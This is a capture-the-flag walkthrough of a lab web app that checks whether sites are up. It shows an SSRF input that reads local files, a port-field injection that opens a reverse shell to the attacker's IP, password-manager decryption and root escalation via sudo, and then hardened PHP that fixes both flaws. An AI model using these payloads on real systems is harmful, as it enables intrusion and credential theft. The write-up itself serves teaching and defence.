Extended version of [[Info]] from what was taken in the video

# Victim IP
```
10.129.39.124
```

# Attacker IP
```
10.10.14.191
```

# Nmap
[[Nmap]]
```
PORT      STATE    SERVICE         VERSION
22/tcp    open     ssh             OpenSSH 8.9p1 Ubuntu 3ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 f6:cc:21:7c:ca:da:ed:34:fd:04:ef:e6:f9:4c:dd:f8 (ECDSA)
|_  256 fa:06:1f:f4:bf:8c:e3:b0:c8:40:21:0d:57:06:dd:11 (ED25519)
80/tcp    open     http            Apache httpd 2.4.52 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Is it down or just me?
|_http-server-header: Apache/2.4.52 (Ubuntu)
3190/tcp  filtered csvr-proxy
3329/tcp  filtered hp-device-disc
4285/tcp  filtered vrml-multi-use
4680/tcp  filtered mgemanagement
4967/tcp  filtered unknown
6336/tcp  filtered unknown
7753/tcp  filtered unknown
8999/tcp  filtered bctp
10362/tcp filtered unknown
11051/tcp filtered unknown
11600/tcp filtered tempest-port
11903/tcp filtered unknown
12708/tcp filtered unknown
13199/tcp filtered unknown
15078/tcp filtered unknown
16140/tcp filtered unknown
17153/tcp filtered unknown
17609/tcp filtered unknown
25119/tcp filtered unknown
34475/tcp filtered unknown
35375/tcp filtered unknown
39696/tcp filtered unknown
40259/tcp filtered unknown
41464/tcp filtered unknown
44320/tcp filtered unknown
46811/tcp filtered unknown
49334/tcp filtered unknown
51690/tcp filtered unknown
54014/tcp filtered unknown
54250/tcp filtered unknown
59865/tcp filtered unknown
61349/tcp filtered unknown
62024/tcp filtered unknown
63662/tcp filtered unknown
65417/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 16:30
Completed NSE at 16:30, 0.00s elapsed
Initiating NSE at 16:30
Completed NSE at 16:30, 0.00s elapsed
Initiating NSE at 16:30
Completed NSE at 16:30, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 590.06 seconds
           Raw packets sent: 72586 (3.194MB) | Rcvd: 70925 (2.889MB)
```

The target does not have an internet connection but can reach http / https addresses, which gives us an SSRF to work with; have the request running in Burp Suite. Tried other schemes such as `file://` but got an error. About to run gobuster for directory / file enumeration.

# Gobuster
[[Gobuster]]
```
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.39.124
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/javascript           (Status: 301) [Size: 319] [--> http://10.129.39.124/javascript/]
/index.php            (Status: 200) [Size: 739]
/server-status        (Status: 403) [Size: 278]
Progress: 47937 / 60000 (79.89%)[ERROR] parse "http://10.129.39.124/error\x1f_log": net/url: invalid control character in URL
[ERROR] parse "http://10.129.39.124/error\x1f_log.php": net/url: invalid control character in URL
Progress: 59998 / 60000 (100.00%)
===============================================================
Finished
===============================================================
```

Nothing of interest from gobuster.

By requesting
```
http://+file%3a///etc/passwd
```
as the `url` parameter in the POST request we get the contents of `/etc/passwd` back, where we discover that the user `aleks` has `/bin/bash` as a login shell. The `+` decodes to a space, so the backend only sees the `http://` prefix it checks for, while the shell splits the value into two separate curl URLs, the second of which is `file:///etc/passwd`.

We were also able to disclose `index.php` itself by requesting `http:// file:///var/www/html/index.php` (URL-encoded, of course) and got this source back after HTML-decoding it:

```php
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Is it down or just me?</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <header>
        <img src="/logo.png" alt="Logo">
        <h2>Is it down or just me?</h2>
    </header>
    <div class="container">
<?php
if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' ) {
    echo '<h1>Is the port refused, or is it just you?</h1>
        <form id="urlForm" action="index.php?expertmode=tcp" method="POST">
        <input type="text" id="url" name="ip" placeholder="Please enter an IP." required><br>
        <input type="number" id="port" name="port" placeholder="Please enter a port number." required><br>
        <button type="submit">Is it refused?</button>
        </form>';
} else {
    echo '<h1>Is that website down, or is it just you?</h1>
        <form id="urlForm" action="index.php" method="POST">
        <input type="url" id="url" name="url" placeholder="Please enter a URL." required><br>
        <button type="submit">Is it down?</button>
        </form>';
}

if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' && isset($_POST['ip']) && isset($_POST['port']) ) {
    $ip = trim($_POST['ip']);
    $valid_ip = filter_var($ip, FILTER_VALIDATE_IP);
    $port = trim($_POST['port']);
    $port_int = intval($port);
    $valid_port = filter_var($port_int, FILTER_VALIDATE_INT);
    if ( $valid_ip && $valid_port ) {
        $rc = 255; $output = '';
        $ec = escapeshellcmd("/usr/bin/nc -vz $ip $port");
        exec($ec . " 2>&1",$output,$rc);
        echo '<div class="output" id="outputSection">';
        if ( $rc === 0 ) {
            echo "<font size=+1>It is up. It's just you! 😝</font><br><br>";
            echo '<p id="outputDetails"><pre>'.htmlspecialchars(implode("\n",$output)).'</pre></p>';
        } else {
            echo "<font size=+1>It is down for everyone! 😔</font><br><br>";
            echo '<p id="outputDetails"><pre>'.htmlspecialchars(implode("\n",$output)).'</pre></p>';
        }
    } else {
        echo '<div class="output" id="outputSection">';
        echo '<font color=red size=+1>Please specify a correct IP and a port between 1 and 65535.</font>';
    }
} elseif (isset($_POST['url'])) {
    $url = trim($_POST['url']);
    if ( preg_match('|^https?://|',$url) ) {
        $rc = 255; $output = '';
        $ec = escapeshellcmd("/usr/bin/curl -s $url");
        exec($ec . " 2>&1",$output,$rc);
        echo '<div class="output" id="outputSection">';
        if ( $rc === 0 ) {
            echo "<font size=+1>It is up. It's just you! 😝</font><br><br>";
            echo '<p id="outputDetails"><pre>'.htmlspecialchars(implode("\n",$output)).'</pre></p>';
        } else {
            echo "<font size=+1>It is down for everyone! 😔</font><br><br>";
        }
    } else {
        echo '<div class="output" id="outputSection">';
        echo '<font color=red size=+1>Only protocols http or https allowed.</font>';
    }
}
?>
        </div>
    </div>
    <footer>© 2024 isitdownorjustme LLC</footer>
</body>
</html>
```

This part:

```php
<?php
if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' ) {
    echo '<h1>Is the port refused, or is it just you?</h1>
        <form id="urlForm" action="index.php?expertmode=tcp" method="POST">
        <input type="text" id="url" name="ip" placeholder="Please enter an IP." required><br>
        <input type="number" id="port" name="port" placeholder="Please enter a port number." required><br>
        <button type="submit">Is it refused?</button>
        </form>';
} else {
    echo '<h1>Is that website down, or is it just you?</h1>
        <form id="urlForm" action="index.php" method="POST">
        <input type="url" id="url" name="url" placeholder="Please enter a URL." required><br>
        <button type="submit">Is it down?</button>
        </form>';
}
```

stands out, as it looks for a GET parameter `expertmode` with the value `tcp` to show a second form that takes an IP and a port. The `port` field of that form is only validated as `intval($port)`, but the raw string is what gets interpolated into the `nc` command, and `escapeshellcmd` leaves spaces and dashes alone. So by sending the following POST body to `index.php?expertmode=tcp` in [[Burpsuite]]:

```
ip=10.10.14.191&port=1337 -e /bin/bash
```

and listening with [[netcat|nc]] we get a reverse shell.

We can upgrade the shell using [[upgrade shell|Upgrade Shell]].

Using the new shell we can run `whoami` or `id` to confirm we are running as the `www-data` user. The user flag is in the directory we land in.

We have read access to part of the user `aleks` home folder in `/home/aleks`, where we find the file `pswm` in `/home/aleks/.local/share/pswm`. Some googling reveals that `pswm` is a Python password manager, and googling `pswm-bruteforce` gives us the GitHub repository [pswm-decryptor](https://github.com/seriotonctf/pswm-decryptor). We had to use [[pip]] to install its dependency `cryptocode`, then change the file it looks for to the copy we pulled down (`pswm` in caden64's case, `pswm2` in Dave's case), and ran the script to get the master password `flower`, which also gave us `aleks`' password. We were then able to switch users and check what sudo permissions we had, and noticed we had permission to run any command as root. Running

```bash
sudo su
```

switches to the root user, and the root flag is in `/root`.
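As an added example, not part of the original writeup or of the box's own `index.php`, here is a hardened version of the two `exec()` branches in the source above. It assumes the same two inputs (`ip`/`port` and `url`) and the same `/usr/bin/nc` and `/usr/bin/curl` binaries; the function names are mine. Two changes close both paths used in this writeup: the port is validated as the raw string (digits only, 1 to 65535) instead of as `intval()` of it, and every user-supplied value goes through `escapeshellarg()` so it becomes exactly one argument, which stops both extra `nc` flags in `port` and a second space-separated URL in `url`. The URL is also parsed with `parse_url()` and its scheme checked, rather than only prefix-matched.

```php
<?php
// Hardened replacement for the two exec() branches of index.php.
// Added example, not the application's own code; function names are assumptions.

// Accept only a plain decimal port string in 1..65535. The original validated
// intval($port), and intval("1337 -e /bin/bash") is 1337, so that check passed
// while the raw string was still interpolated into the nc command line.
function validate_port(string $port): ?int
{
    if (!preg_match('/^[0-9]{1,5}$/', $port)) {
        return null;
    }
    $n = (int) $port;
    return ($n >= 1 && $n <= 65535) ? $n : null;
}

// IPv4/IPv6 literal only; anything containing spaces or flags fails FILTER_VALIDATE_IP.
function validate_ip(string $ip): ?string
{
    $v = filter_var($ip, FILTER_VALIDATE_IP);
    return $v === false ? null : $v;
}

// Require a single, parseable http/https URL with a host. The original only
// prefix-matched '|^https?://|', so "http:// file:///etc/passwd" passed and the
// shell split it into two curl arguments.
function validate_url(string $url): ?string
{
    if (preg_match('/\s/', $url)) {
        return null; // no whitespace anywhere in the value
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    // Note: blocking internal/loopback hosts (the SSRF side) is a separate
    // allowlist decision and is not shown here.
    return $url;
}

// Build commands from escapeshellarg()'d pieces so each user value is exactly
// one argv entry. Returns [exit code, output lines], mirroring exec().
function run_tcp_check(string $ip, string $port): array
{
    $valid_ip   = validate_ip($ip);
    $valid_port = validate_port($port);
    if ($valid_ip === null || $valid_port === null) {
        return [255, ['Please specify a correct IP and a port between 1 and 65535.']];
    }
    $ec = '/usr/bin/nc -vz ' . escapeshellarg($valid_ip) . ' ' . escapeshellarg((string) $valid_port);
    $output = [];
    $rc = 255;
    exec($ec . ' 2>&1', $output, $rc);
    return [$rc, $output];
}

function run_http_check(string $url): array
{
    $valid_url = validate_url($url);
    if ($valid_url === null) {
        return [255, ['Only protocols http or https allowed.']];
    }
    // --proto =http,https makes curl itself refuse file://, gopher:// and the rest,
    // independently of what our validator accepted.
    $ec = '/usr/bin/curl -s --proto =http,https ' . escapeshellarg($valid_url);
    $output = [];
    $rc = 255;
    exec($ec . ' 2>&1', $output, $rc);
    return [$rc, $output];
}

// Quick check from the command line using the two inputs seen in this writeup
// plus benign ones (constructed inputs; only the validators run, no command is executed).
if (PHP_SAPI === 'cli') {
    var_dump(validate_port('1337 -e /bin/bash'));
    var_dump(validate_port('1337'));
    var_dump(validate_url('http:// file:///etc/passwd'));
    var_dump(validate_url('http://10.10.14.191/'));
}
```

Run with `php hardened.php`, the two inputs taken from this writeup are rejected (both validators return `null`) while the plain port and the plain URL are accepted. The key design point is that validation and quoting are separate layers: the validators reject anything that is not a single port number or a single URL, and `escapeshellarg()` guarantees that whatever does get through is passed to `nc` or `curl` as one argument, never re-split by the shell.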